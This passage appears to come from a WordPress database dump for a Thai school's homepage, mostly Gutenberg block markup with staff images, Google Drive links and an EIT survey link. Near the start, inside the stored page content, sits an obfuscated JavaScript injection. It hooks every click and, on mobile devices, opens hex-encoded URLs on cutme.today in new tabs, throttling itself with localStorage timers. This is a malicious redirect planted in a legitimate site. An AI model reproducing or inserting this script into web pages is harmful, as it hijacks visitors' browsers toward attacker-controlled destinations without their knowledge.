-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 10:39:11','2025-07-15 03:39:11','',19,'http://watprato.ssk.in.th/?p=673',0,'revision','',0),
(674,1,'2025-07-15 14:17:20','2025-07-15 07:17:20','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_67610f-d3\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_67610f-d3\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3b4373-bb\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_d15510-f9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_d15510-f9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_27c3a7-66\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_27c3a7-66\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_c3bdf0-e8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_c3bdf0-e8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_aba00e-94\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_aba00e-94\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_6a67b5-2d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_6a67b5-2d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_735bb1-be\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_735bb1-be\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_e25727-a3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_e25727-a3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d0afc7-03\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d0afc7-03\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_f03b47-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_f03b47-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_321a89-b1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_321a89-b1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-560\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/EIT_QRCode-2.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_bf2eae-a8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_bf2eae-a8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-418\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_eaf89e-46\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_eaf89e-46\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ได้รับรางวัล \"สถานศึกษาที่มีวิธีปฏิบัติที่เป็นเลิศ\"</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_2ed102-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_2ed102-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-574\" style=\"width: 250px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/508745932_122233182272202781_2147005512618392889_n-1.jpg\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 